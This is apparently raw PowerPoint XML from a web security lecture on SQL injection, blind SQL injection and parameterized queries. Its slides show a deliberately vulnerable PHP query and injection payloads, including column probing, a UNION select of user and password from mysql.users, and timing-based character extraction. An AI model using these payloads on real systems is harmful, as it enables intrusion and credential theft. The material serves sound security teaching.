            <a:ext cx="1066800" cy="106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408843" y="1962908"/>
            <a:ext cx="428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subdomain.mysite.com/folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Microsoft SQL Ser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973" y="4907543"/>
            <a:ext cx="1682246" cy="1381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://www.geekpeek.net/wp-content/uploads/2013/07/Apache-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73" y="2685357"/>
            <a:ext cx="1850017" cy="127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5600" y="1424221"/>
            <a:ext cx="1600200" cy="2304288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14346" name="Picture 10" descr="http://www.planet-source-code.com/vb/2010Redesign/images/LangugeHomePages/PHP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106" y="3773258"/>
            <a:ext cx="1086267" cy="57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6788685" y="4194188"/>
            <a:ext cx="190468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Database Queries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33884" y="2339113"/>
            <a:ext cx="3898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HTML Page, JS file, CSS file, image, etc.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633884" y="2685357"/>
            <a:ext cx="38312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1349" y="4421966"/>
            <a:ext cx="4090084" cy="14773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GET Requests: Used for requests for pages, resources, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST Requests: Used for form submissions, logins, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19563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66917E9-C890-4124-BBEF-2FBCA2116E52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pic>
        <p:nvPicPr>
          <p:cNvPr id="99330" name="Picture 2" descr="Exploits of a M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236" y="2277374"/>
            <a:ext cx="8444964" cy="2599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37968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Table Layout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Column Numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Column Names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Querying other tables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701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Probing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of Columns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ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;number&gt; can be added to an SQL query to order results by a column.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65038" y="2819400"/>
            <a:ext cx="6934200" cy="9144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select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 1 ORDER BY 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Snip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860238" y="3992563"/>
            <a:ext cx="7543800" cy="21336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$id = $_GET['id'];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"SELECT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‘$id’";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$result =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mysql_query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) or die('&lt;pre&gt;' .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mysql_error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() . '&lt;/pre&gt;' );</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35547037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Probing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of Columns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00163"/>
            <a:ext cx="8229600" cy="475456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ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;number&gt; can be added to an SQL query to order results by a column.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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Snip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2667000"/>
            <a:ext cx="7543800" cy="15240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“SELECT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‘$id’”;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62000" y="4495800"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="28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800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ ORDER BY 1;#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4521200"/>
              <a:ext cx="70742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accent5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✓</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5400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62000" y="5588000"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="28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800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ ORDER BY 3;#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" y="4521200"/>
              <a:ext cx="5822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✗</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="54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68053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Probing Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Names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00163"/>
            <a:ext cx="8229600" cy="4754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query with an incorrect column name will give an error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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Snip Single Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2667000"/>
            <a:ext cx="7543800" cy="15240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“SELECT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‘$id’”;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62000" y="4495800"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="28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800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ or </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> IS NULL;#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4521200"/>
              <a:ext cx="70742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accent5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✓</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5400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62000" y="5588000"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="28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800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ or </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>firstname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> IS NULL;#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7200" y="4521200"/>
              <a:ext cx="5822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✗</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="54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68157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extra tables with UNION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35</a:t>
            </a:fld>
            <a:endParaRPr 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300163"/>
            <a:ext cx="8229600" cy="4754563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="292100" indent="-2921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635000" indent="-2921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320800" indent="-1778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/>
              <a:t>&lt;query 1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;query 2&gt; can be used to construct a separate query 2.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Snip Single Corner Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="2667000"/>
            <a:ext cx="7543800" cy="15240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 anchorCtr="1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$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getid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“SELECT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first_name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last_name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FROM users </a:t>
            </a:r>
            <a:b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	    WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r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 = ‘$id’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>...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98581" y="4495800"/>
            <a:ext cx="7946838" cy="1502516"/>
            <a:chOff x="152400" y="4495800"/>
            <a:chExt cx="7946838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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="24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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ UNION select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user,password</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysql.users</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>;#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2400" y="4521200"/>
              <a:ext cx="1036562" cy="8803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800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5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✓</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="8800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14077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2800" y="1473200"/>
            <a:ext cx="3987800" cy="3911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1117203"/>
            <a:ext cx="3810000" cy="4623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Leaking the result of error messages is a poor security practice. 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Errors leaks information!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16700181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Messages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50981" y="1447800"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="24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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ ORDER BY 3;#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" y="4521200"/>
              <a:ext cx="5822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✗</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5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50981" y="3962400"/>
            <a:ext cx="7642038" cy="948730"/>
            <a:chOff x="457200" y="4495800"/>
            <a:chExt cx="7642038" cy="948730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1165038" y="4495800"/>
              <a:ext cx="6934200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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select </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>first_name,last_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> from users where </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_id</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> = ‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’ or </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>firstname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> IS NULL;#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" y="4521200"/>
              <a:ext cx="58221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✗</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr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1446119" y="2438400"/>
            <a:ext cx="6934200" cy="9144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/>
              <a:t>Error returned to user:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unknown column '3' in 'order clause’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58819" y="4953000"/>
            <a:ext cx="6934200" cy="9144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/>
              <a:t>Error returned to user:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unknown column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>' in 'where clause'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12734491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Blind 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086600" y="3810000"/>
            <a:ext cx="372595" cy="1143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7715646" y="3429000"/>
            <a:ext cx="209154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162300" y="2576365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81400" y="1806309"/>
            <a:ext cx="1689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user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5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5998" y="4234146"/>
            <a:ext cx="3543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SELECT FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5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3361" y="3774173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28009" y="2631180"/>
            <a:ext cx="1082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“jburket”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3216275" y="160666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3140075" y="4241947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8234557" y="333245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21" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="2673565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4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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Multiply 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3789015" y="2061274"/>
            <a:ext cx="1482143" cy="1509143"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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20563" y="5287828"/>
            <a:ext cx="4914900" cy="948399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Sometimes results of SQL queries are not sent back to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392755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Blind SQL Injection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Defn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> SQL injection attack is an attack against a server that responds with generic error page or even nothing at all.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Approach: ask a series of True/False questions, exploit side-channels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7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575045"/>
            <a:ext cx="1600200" cy="23042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091952"/>
            <a:ext cx="2182611" cy="1270475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3162300" y="2360624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162300" y="2727189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03556" y="2969870"/>
            <a:ext cx="1395000" cy="1395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Client Attacking Server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SQL Injection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543149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File System Traversal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Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784224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Blind 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7848600" y="3322637"/>
            <a:ext cx="1" cy="1630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93338" y="1563469"/>
            <a:ext cx="381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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’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7749" y="3925669"/>
            <a:ext cx="381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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’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2328213" y="1370519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3611826" y="3933470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1143000" y="4979276"/>
            <a:ext cx="4572000" cy="9906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If the first letter of the username is A (65), there will be a 5 second delay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57200" y="435255"/>
            <a:ext cx="2290111" cy="1142201"/>
            <a:chOff x="457200" y="435255"/>
            <a:chExt cx="2290111" cy="1142201"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Arrow 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1346787">
              <a:off x="1909111" y="1067598"/>
              <a:ext cx="838200" cy="509858"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow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57200" y="435255"/>
              <a:ext cx="1676400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="round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Actual MySQL syntax!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275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Blind SQL Injection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189" y="1418949"/>
            <a:ext cx="1600200" cy="230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021" y="5029200"/>
            <a:ext cx="91125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41128"/>
            <a:ext cx="2182611" cy="12704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162300" y="2209800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7848600" y="3322637"/>
            <a:ext cx="1" cy="1630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93338" y="1563469"/>
            <a:ext cx="381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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’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7749" y="3925669"/>
            <a:ext cx="381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ASCII(SUBSTRING(username,1,1)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 65 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2328213" y="1370519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8" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3611826" y="3933470"/>
            <a:ext cx="365125" cy="365125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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2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24256" y="2926933"/>
            <a:ext cx="1219200" cy="1219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476" y="3850500"/>
            <a:ext cx="1485000" cy="11025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097226" y="5337422"/>
            <a:ext cx="5029200" cy="879000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/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By timing responses, the attacker learns about the database one bit at a time </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376024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Parameterized Queries with Bound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97" y="1600200"/>
            <a:ext cx="653030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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>public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b="1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setUpAndExecPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r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 query = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>conn.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
